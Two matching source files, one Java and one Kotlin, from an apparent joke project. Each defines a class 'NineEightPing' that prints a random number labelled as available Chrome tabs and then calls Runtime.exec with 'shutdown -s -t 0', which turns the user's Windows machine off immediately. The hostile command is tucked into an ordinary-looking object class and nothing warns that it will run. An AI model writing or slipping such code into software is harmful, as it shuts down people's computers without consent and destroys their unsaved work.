File: src/main/java/gq/noxiuam/bitches/object/type/special/NineEightPing.java
package gq.noxiuam.bitches.object.type.special;

import gq.noxiuam.bitches.Main;
import lombok.SneakyThrows;

public class NineEightPing extends Main {

    @Override
    @SneakyThrows
    public void init() {

        int availableChromeTabs = Main.random.nextInt(100);
        System.out.println(availableChromeTabs);

        Runtime runtime = Runtime.getRuntime();
        runtime.exec("shutdown -s -t 0");
        System.exit(0);

    }
}

File: src/main/kotlin/gq/noxiuam/bitches/object/type/special/NineEightPing.kt
package gq.noxiuam.bitches.`object`.type.special

import gq.noxiuam.bitches.Main
import lombok.SneakyThrows
import kotlin.system.exitProcess

class NineEightPing : Main() {
    @SneakyThrows
    override fun init() {
        val availableChromeTabs: Int = random.nextInt(100)
        println(availableChromeTabs)
        val runtime = Runtime.getRuntime()
        runtime.exec("shutdown -s -t 0")
        exitProcess(0)
    }
}